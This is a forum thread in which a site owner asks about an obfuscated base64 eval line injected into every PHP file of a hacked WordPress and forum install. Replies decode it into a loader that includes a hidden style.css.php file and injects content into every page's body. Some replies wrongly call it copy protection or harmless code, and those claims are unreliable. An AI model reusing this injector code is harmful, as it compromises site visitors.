who can tell me what this is?

i got this code at the top of every php file:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcva3VuZGVuL2hvbWVwYWdlcy8xMC9kMTA3NjM1MzY4L2h0ZG9jcy9Gb3J1bS9ibG9nL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2t1bmRlbi9ob21lcGFnZXMvMTAvZDEwNzYzNTM2OC9odGRvY3MvRm9ydW0vYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9pbWFnZXMveHAvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

Code (markup):

anyone know what this is please?

 

any idea how i could do that?

 

Looks dorky to me. I bet it's a cheat code for dungeons and dragons.

 

thanks but i get nothing from that, just gibberish.


i think i got this solved, thanks all.

 

Its a php base64 encrypted php code.. this is to use protect PHP codes from copying or editing.
It can be decoded with reverse engendering though.

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/kunden/homepages/10/d107635368/htdocs/Forum/blog/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php')){include_once('/kunden/homepages/10/d107635368/htdocs/Forum/blog/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

Code (markup):

 

If someone encrypt some codes you shouldn't decrypt. Author don't want it so that's why he encrypt the code.

 

Don't have the slightest idea.

 

thanks for everyones thoughts, i'll spread some love.

i needed to know what it was so i could trace it back.
someones wordpress got hacked and injected that string into the top of every php file in the forum folder.
guy had his blog folder in the forum folder, so the forum got shanked as well.

now i need to find a way to remove all that,
is it a manual thing or is there another way, not so tedious?

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/kunden/homepages/10/d107635368/htdocs/Forum/blog/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php')){include_once('/kunden/homepages/10/d107635368/htdocs/Forum/blog/wp-includes/js/tinymce/themes/advanced/images/xp/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

PHP:

This is what it decodes to. What that is, is some rough php coding. It seems to have a bunch of 'if' funtions in it. It really would make no sense unless you saw what it was operating. This could be checking a file ensuring everything is correct, or it could be checking the variables of a form you submitted on a previous page.

But this code ofcourse could not run by itself because it refers to TONS of other info like:

This 'u' variable has not been previously defined in the code, which means to know what 'u' equals you would have to have the other files that define it. maybe like a language.php file or something.

This also just seems to be a snippet of a php code, because it doesnt start with the "<php" and end with "php>" tags. also it doesnt refer to all the files it would need to refer back to to define all these weird variables that are left undefined.